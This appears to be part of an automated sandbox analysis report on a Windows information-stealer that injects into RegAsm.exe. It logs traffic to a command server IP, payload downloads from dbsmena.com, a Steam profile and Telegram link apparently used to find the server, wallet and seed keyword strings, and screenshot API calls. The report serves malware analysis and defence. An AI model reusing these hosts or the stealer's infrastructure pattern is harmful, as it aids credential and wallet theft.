Source: global traffic | HTTP traffic detected: GET /msvcp140.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 5.75.211.162 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /softokn3.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 5.75.211.162 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 5.75.211.162 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /nss3.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 5.75.211.162 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----HJDAKFBFBFBAAAAAEBKJ | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 5.75.211.162 | Content-Length: 1145 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----GCGCBAECFCAKKEBFCFII | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 5.75.211.162 | Content-Length: 331 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----DHIDHIEGIIIECAKEBFBA | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 5.75.211.162 | Content-Length: 331 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----BAKEBAFIIECBGCAAAAFC | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 5.75.211.162 | Content-Length: 461 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----FBKJDGCGDAAAKECAKKJD | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 5.75.211.162 | Content-Length: 98097 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----AAKKFHCFIECAAAKEGCFI | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 5.75.211.162 | Content-Length: 331 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /ljhgfsd.exe HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: dbsmena.com | Cache-Control: no-cache
                        Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_00406963 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,2_2_00406963
                        Source: global traffic | HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1 | Host: steamcommunity.com | Connection: Keep-Alive | Cache-Control: no-cache
                        Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 5.75.211.162 | Connection: Keep-Alive | Cache-Control: no-cache
                        Source: global traffic | HTTP traffic detected: GET /sqlp.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 5.75.211.162 | Connection: Keep-Alive | Cache-Control: no-cache
                        Source: global traffic | DNS traffic detected: DNS query: steamcommunity.com
                        Source: global traffic | DNS traffic detected: DNS query: dbsmena.com
                        Source: unknown | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----AEGHIJEHJDHIDHIDAEHC | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 5.75.211.162 | Content-Length: 255 | Connection: Keep-Alive | Cache-Control: no-cache
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=B0lGn8MokmdT&l=e
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
                        Source: 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
                        Source: RegAsm.exe, 00000002.00000002.3293998119.00000000014BE000.00000004.00000020.00020000.00000000.sdmp, CFHDBF.2.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                        Source: RegAsm.exe, 00000002.00000002.3293998119.00000000014BE000.00000004.00000020.00020000.00000000.sdmp, CFHDBF.2.drString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
                        Source: RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dbsmena.com/
                        Source: RegAsm.exe, 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://dbsmena.com/ljhgfsd.exe
                        Source: RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dbsmena.com/ljhgfsd.exe)
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://dbsmena.com/ljhgfsd.exe1kkkk1218740https://dbsmena.com/vdshfd.exe1kkkk783966f7e54258
                        Source: RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dbsmena.com/ljhgfsd.exe?
                        Source: RegAsm.exe, 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://dbsmena.com/ljhgfsd.exea;
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://dbsmena.com/ljhgfsd.exeent-Disposition:
                        Source: RegAsm.exe, 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://dbsmena.com/ljhgfsd.exefCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0b
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dbsmena.com/vdshfd.exe
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://dbsmena.com/vdshfd.exetent-Disposition:
                        Source: AAAAKJ.2.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                        Source: AAAAKJ.2.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                        Source: AAAAKJ.2.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://help.steampowered.com/en/
                        Source: CFHDBF.2.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                        Source: RegAsm.exe, 00000002.00000002.3312936893.0000000034E93000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3318468661.0000000040D70000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3307228055.0000000028FBA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3304395342.0000000023050000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: https://mozilla.org0/
                        Source: 76561199780418869[1].htm.2.drString found in binary or memory: https://steamcommunity.com/
                        Source: RegAsm.exe, 00000002.00000002.3293998119.0000000001331000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/6
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://steamcommunity.com/discussions/
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                        Source: 76561199780418869[1].htm.2.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199780418869
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://steamcommunity.com/market/
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
                        Source: file.exe, 00000000.00000002.2060446715.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.0000000001331000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869
                        Source: RegAsm.exe, 00000002.00000002.3293998119.0000000001331000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869$
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/badges
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/inventory/
                        Source: RegAsm.exe, 00000002.00000002.3293998119.0000000001331000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/765611997804188695
                        Source: file.exe, 00000000.00000002.2060446715.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://steamcommunity.com/workshop/
                        Source: 76561199780418869[1].htm.2.drString found in binary or memory: https://store.steampowered.com/
                        Source: 76561199780418869[1].htm.2.drString found in binary or memory: https://store.steampowered.com/about/
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://store.steampowered.com/explore/
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://store.steampowered.com/legal/
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://store.steampowered.com/mobile
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://store.steampowered.com/news/
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://store.steampowered.com/points/shop/
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privac
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://store.steampowered.com/stats/
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                        Source: EBKKKE.2.drString found in binary or memory: https://support.mozilla.org
                        Source: EBKKKE.2.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                        Source: EBKKKE.2.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
                        Source: file.exe, 00000000.00000002.2060446715.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/ae5ed
                        Source: RegAsm.exe, 00000002.00000002.3293998119.00000000014BE000.00000004.00000020.00020000.00000000.sdmp, CFHDBF.2.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
                        Source: RegAsm.exe, 00000002.00000002.3293998119.00000000014BE000.00000004.00000020.00020000.00000000.sdmp, CFHDBF.2.drString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
                        Source: RegAsm.exe, 00000002.00000002.3312936893.0000000034E93000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3318468661.0000000040D70000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3307228055.0000000028FBA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3304395342.0000000023050000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: https://www.digicert.com/CPS0
                        Source: AAAAKJ.2.drString found in binary or memory: https://www.ecosia.org/newtab/
                        Source: file.exeString found in binary or memory: https://www.entrust.net/rpa0
                        Source: AAAAKJ.2.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                        Source: EBKKKE.2.drString found in binary or memory: https://www.mozilla.org
                        Source: RegAsm.exe, 00000002.00000002.3298728930.000000001C3EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                        Source: EBKKKE.2.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                        Source: RegAsm.exe, 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/ost.exe
                        Source: RegAsm.exe, 00000002.00000002.3298728930.000000001C3EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                        Source: EBKKKE.2.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                        Source: RegAsm.exe, 00000002.00000002.3298728930.000000001C3EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                        Source: EBKKKE.2.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                        Source: EBKKKE.2.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                        Source: EBKKKE.2.drString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                        Source: RegAsm.exe, 00000002.00000002.3298728930.000000001C3EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                        Source: EBKKKE.2.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                        Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49715 version: TLS 1.2
                        Source: unknown HTTPS traffic detected: 5.75.211.162:443 -> 192.168.2.5:49716 version: TLS 1.2
                        Source: unknown HTTPS traffic detected: 172.105.54.160:443 -> 192.168.2.5:49739 version: TLS 1.2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00411F55 CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow, 2_2_00411F55

                        System Summary

                        Source: file.exe, MoveAngles.csLarge array initialization: MoveAngles: array initializer size 393216
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040145B GetCurrentProcess,NtQueryInformationProcess,2_2_0040145B
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0FB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,2_2_6C0FB700
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0FB8C0 rand_s,NtQueryVirtualMemory,2_2_6C0FB8C0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0FB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,2_2_6C0FB910
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C09F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,2_2_6C09F280
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004047E8 appears 38 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00410609 appears 71 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6C0D94D0 appears 90 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004104E7 appears 36 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6C0CCBE8 appears 134 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6C2C09D0 appears 69 times
                        Source: file.exeStatic PE information: invalid certificate
                        Source: DAEBKKKEHD.exe.2.drStatic PE information: No import functions for PE file found
                        Source: ljhgfsd[1].exe.2.drStatic PE information: No import functions for PE file found
                        Source: DAEBKKKEHD.exe.2.drStatic PE information: Data appended to the last section found
                        Source: ljhgfsd[1].exe.2.drStatic PE information: Data appended to the last section found
                        Source: file.exe, 00000000.00000002.2058201350.000000000125E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs file.exe
